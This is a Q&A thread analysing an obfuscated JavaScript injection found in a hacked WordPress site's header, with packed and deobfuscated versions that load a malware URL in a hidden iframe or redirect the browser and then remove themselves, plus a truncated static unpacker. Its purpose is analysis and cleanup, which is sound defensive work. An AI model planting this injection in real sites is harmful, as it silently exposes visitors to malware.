22

I am not sure if this is the correct place to ask a question such as this, apologies if it isn't.

I have found the below code in the header of one of my WordPress websites. I am pretty sure it is malicious and I have removed it. However, I am curious and I can't work out what its purpose is.

Is anyone able to provide any ideas?

Base 64 Encoded:


Actual Code:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\\"3G:3F;3C:-3D;\\"><1y 3E=\\"1l\\" 3q=\\""+G+"\\" 3p=\\"1l\\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\\d+|4h).+1h|4i|4j\\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\\-(n|u)|25\\/|33|2Q|2R\\-|2P|2O|2L|2M\\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\\-s|2z|2w|2v|1i(c|p)o|2s(12|\\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\\-|1q)|1L u|2J|2W|2Y\\-5|g\\-15|1c(\\.w|1d)|31(30|2U)|2r|2T|2S\\-(m|p|t)|4e\\-|4D(1G|1F)|6m( i|1u)|6n\\-c|6o(c(\\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\\-(20|1c|X)|6q|4v( |\\-|\\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\\/)|5U|5V |5W\\-|5X(c|k)|65(66|6c)|6d( g|\\/(k|l|u)|50|54|\\-[a-w])|68|69|6z\\-w|72|73\\/|X(T|74|71)|1z(F|21|1n)|m\\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\\-| |o|v)|77)|78(50|6U|v 
)|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\\-2|59(1U|58|1s)|55|56|1G\\-g|57\\-a|4P(4C|12|21|32|60|\\-[2-7]|i\\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\\-|1x|p\\-)|5G\\/|1s(c(\\-|0|1)|47|1z|1E|1D)|5A\\-|5B|5C(\\-|m)|5I\\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\\-|v\\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\\-|5o\\-|5p(i|m)|5v\\-|t\\-15|5x(1K|5u)|1J(70|m\\-|5q|5r)|5s\\-9|1H(\\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\\-|67|6a|6b\\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2
|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
RoraΖ
bf2mad
  • 1
    Probably related to "packed" http://stackoverflow.com/questions/21423397/what-does-the-custom-functionp-a-c-k-e-d-used-for – Gudradain Oct 15 '15 at 13:31
  • Thanks, I just used http://dean.edwards.name/unpacker/ to unpack it. Seems to be redirecting or opening a window to http://miwkavoriwka.ml/052F based on device type – bf2mad Oct 15 '15 at 13:39
  • 2
    Yes, you've been hacked. You really should get WordFence, a security plugin. I run a few different blogs that come under attack from time to time, and WordFence does an excellent job of keeping bad actors out and alerting you if anything suspicious does get into your site. – Mason Wheeler Oct 15 '15 at 19:16

4 Answers

21

It seems that the "actual code" you posted is packed using http://matthewfl.com/unPacker.html. When you unpack it you obtain:

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 
|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Which is still obfuscated a bit by using "random" variable names. Still, you can see that the code is trying to redirect you to:

hxxp://miwkavoriwka.ml/052F

Anyone know what this site is for?

schroeder
Gudradain
17

I deobfuscated the code a bit:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// Possibly another mobile phone check?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, including FF's Phishing and Malware Protection list) in an iframe or redirects to that URL (depending on your browser).

edit: After reading the code a bit: The only browsers which seem to be targeted are the ones where these conditions are met:

  • Useragents containing MSIE, Trident/ or Edge/
  • No mobile phone ? (see function is_mobile_phone)
  • Some capability check true (see function some_capability_check)
Pierre.Vriens
SleepProgger
  • 1
    I tried loading the site and it timed out. Even when using some iPhone User Agent. My best guess is they start a scan on connection, or just have the script disabled now. – SleepProgger Oct 15 '15 at 14:31
12

Thanks for all of the great info and help!

I have since discovered how the site was originally hacked. The site was running an old version of the plugin Mailpoet / wysija-newsletters (pre 2.6.7).

Using an exploit in this plugin the attacker managed to upload malicious code which was then used to further infect the site.

https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

Ultimately the security issue with Mailpoet / wysija-newsletters was used to upload a file called .zip to /wp-content/uploads/wysija/temp and then extract the zip and install some dodgy themes. The attached screenshot shows what happened when going into the plugins admin page after the zip had been deleted. It seems that whenever going into wp-admin the site would get reinfected.

The site has now been restored from a clean version, fully patched and the plugin WordFence is running.


bf2mad
6

Its apparent purpose is to infect wp-settings.php, so it infects all of your pages, and links malware through an iframe.

You can remove it by deleting wp_inc/upd.php, but this won't fix the threat vector unless that hole is plugged. However, the "main infection" itself may be located in a different file, if the comments are right. Again, removing this file will not help much if the threat vector is still there.

One person even suggested replacing eval with alert. Others have deobfuscated other versions already by using techniques described in this thread. Your code follows a very similar pattern to that one.

Mark Buffalo
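
An added example, not taken from any of the posts above: the `eval(function(p,a,c,k,e,d){...})` wrapper discussed in this thread can be expanded by parsing its arguments as text instead of running `eval`, and the result checked for the traits seen here (remote URL, off-screen iframe, navigation, self-removing script). The sample input and all function names are constructed for illustration; string escapes other than `\\`, `\'`, `\n`, `\r`, `\t` and radixes above 62 are assumed absent.

```javascript
// Static unpacker for eval(function(p,a,c,k,e,d){...}) wrappers. The input is
// only parsed as text; nothing from it is evaluated.

// Constructed sample (not the script from the question), decoder body elided.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* decoder */}('0 1="2://3.4/5";6.7.8+="<9 a=\\"b:c;d:-e;\\"><f g=\\""+1+"\\"></f></9>";',62,17,'var|url|http|example|invalid|x|document|body|innerHTML|div|style|position|absolute|left|2630px|iframe|src'.split('|'),0,{}))`;

// Captures: 1 payload literal, 2 radix, 3 word count, 4 '|'-joined dictionary.
const PACKED_RE = new RegExp(
  String.raw`eval\(function\(p,\s*a,\s*c,\s*k,\s*e,\s*[dr]\)\s*\{[\s\S]*?\}\s*\(\s*` +
  String.raw`'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*` +
  String.raw`'((?:\\.|[^'\\])*)'\s*\.split\('\|'\)`);

// Undo single-quoted JS string escaping (assumption: no \x.. or \u.... escapes).
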